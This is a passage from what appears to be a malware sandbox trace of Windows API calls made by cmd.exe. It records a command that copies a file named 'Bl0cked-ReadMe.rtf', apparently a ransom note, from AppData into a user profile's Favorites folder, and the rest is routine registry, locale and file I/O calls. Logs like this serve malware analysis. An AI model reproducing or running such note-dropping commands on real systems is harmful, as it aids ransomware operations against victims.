lpBuffer=0x2afd7c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.030] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afd7c, dwLength=0x1c | out: lpBuffer=0x2afd7c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0212.030] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afd7c, dwLength=0x1c | out: lpBuffer=0x2afd7c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0212.030] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afd7c, dwLength=0x1c | out: lpBuffer=0x2afd7c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.030] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afd7c, dwLength=0x1c | out: lpBuffer=0x2afd7c*(BaseAddress=0x2b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0212.030] GetConsoleOutputCP () returned 0x1b5 [0212.030] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.031] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0212.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.031] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0212.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.031] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0212.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.031] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0212.031] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.031] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0212.031] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.031] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0212.031] GetEnvironmentStringsW () returned 0x370188* [0212.032] FreeEnvironmentStringsW (penv=0x370188) returned 1 [0212.032] GetEnvironmentStringsW () returned 0x370188* [0212.032] FreeEnvironmentStringsW (penv=0x370188) returned 1 [0212.032] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed1c | out: phkResult=0x2aed1c*=0x40) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x0, lpData=0x2aed28*=0xb0, lpcbData=0x2aed20*=0x1000) returned 0x2 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x1, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x0, lpData=0x2aed28*=0x1, lpcbData=0x2aed20*=0x1000) returned 0x2 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x0, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x40, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x40, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x0, lpData=0x2aed28*=0x40, lpcbData=0x2aed20*=0x1000) returned 0x2 [0212.032] RegCloseKey (hKey=0x40) returned 0x0 [0212.032] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed1c | out: phkResult=0x2aed1c*=0x40) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x0, lpData=0x2aed28*=0x40, lpcbData=0x2aed20*=0x1000) returned 0x2 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x1, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x0, lpData=0x2aed28*=0x1, lpcbData=0x2aed20*=0x1000) returned 0x2 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x0, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x9, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.033] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x9, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.033] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x0, lpData=0x2aed28*=0x9, lpcbData=0x2aed20*=0x1000) returned 0x2 [0212.033] RegCloseKey (hKey=0x40) returned 0x0 [0212.033] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ae [0212.033] srand (_Seed=0x5b8863ae) [0212.033] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf\"" [0212.033] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf\"" [0212.033] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.033] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3718e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0212.033] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.033] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.033] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0212.033] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0212.033] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0212.033] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0212.033] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0212.033] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0212.034] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0212.034] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0212.034] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0212.034] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0212.034] GetEnvironmentStringsW () returned 0x3722d8* [0212.034] FreeEnvironmentStringsW (penv=0x3722d8) returned 1 [0212.034] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.034] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0212.034] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0212.034] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0212.034] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0212.034] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0212.034] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0212.034] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0212.034] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0212.034] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0212.034] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2afae8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.034] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2afae8, lpFilePart=0x2afae4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2afae4*="Desktop") returned 0x18 [0212.034] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0212.034] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af864 | out: lpFindFileData=0x2af864) returned 0x370018 [0212.035] FindClose (in: hFindFile=0x370018 | out: hFindFile=0x370018) returned 1 [0212.035] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af864 | out: lpFindFileData=0x2af864) returned 0x370018 [0212.035] FindClose (in: hFindFile=0x370018 | out: hFindFile=0x370018) returned 1 [0212.035] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af864 | out: lpFindFileData=0x2af864) returned 0x370018 [0212.035] FindClose (in: hFindFile=0x370018 | out: hFindFile=0x370018) returned 1 [0212.035] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0212.035] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0212.035] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0212.035] GetEnvironmentStringsW () returned 0x372af8* [0212.035] FreeEnvironmentStringsW (penv=0x372af8) returned 1 [0212.035] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.036] GetConsoleOutputCP () returned 0x1b5 [0212.036] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.036] GetUserDefaultLCID () returned 0x409 [0212.036] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0212.036] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afc28, cchData=128 | out: lpLCData="0") returned 2 [0212.036] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afc28, cchData=128 | out: lpLCData="0") returned 2 [0212.036] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afc28, cchData=128 | out: lpLCData="1") returned 2 [0212.036] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0212.036] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0212.037] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0212.038] GetConsoleTitleW (in: lpConsoleTitle=0x3608e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0212.038] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0212.038] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0212.038] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0212.039] _wcsicmp (_String1="type", _String2=")") returned 75 [0212.039] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0212.039] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0212.039] _wcsicmp (_String1="IF", _String2="type") returned -11 [0212.039] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0212.039] _wcsicmp (_String1="REM", _String2="type") returned -2 [0212.039] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0212.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.042] GetFileType (hFile=0x7) returned 0x2 [0212.042] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0212.042] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2afb20 | out: lpMode=0x2afb20) returned 1 [0212.042] _dup (_FileHandle=1) returned 3 [0212.043] _close (_FileHandle=1) returned 0 [0212.043] _wcsicmp (_String1="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0212.043] CreateFileW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favori~1\\micros~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2afaf0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0212.044] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0212.044] GetConsoleTitleW (in: lpConsoleTitle=0x2af920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.044] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0212.044] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0212.044] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0212.044] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0212.045] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.045] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2af484, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af484) returned 0x360e78 [0212.045] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0212.045] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0212.045] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0212.046] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ae390, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0212.046] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0212.046] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.046] GetFileType (hFile=0x54) returned 0x1 [0212.046] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.046] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ae3e8 | out: lpFileSizeHigh=0x2ae3e8*=0x0) returned 0x1632 [0212.046] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.046] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.046] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.046] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.046] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.046] GetFileType (hFile=0x4c) returned 0x1 [0212.046] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.046] GetFileType (hFile=0x4c) returned 0x1 [0212.046] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.046] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.047] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.047] GetFileType (hFile=0x4c) returned 0x1 [0212.047] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.047] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.047] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.048] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.048] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.048] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.048] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] GetFileType (hFile=0x4c) returned 0x1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] GetFileType (hFile=0x4c) returned 0x1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] GetFileType (hFile=0x4c) returned 0x1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] GetFileType (hFile=0x4c) returned 0x1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] GetFileType (hFile=0x4c) returned 0x1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] GetFileType (hFile=0x4c) returned 0x1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.049] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.050] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, 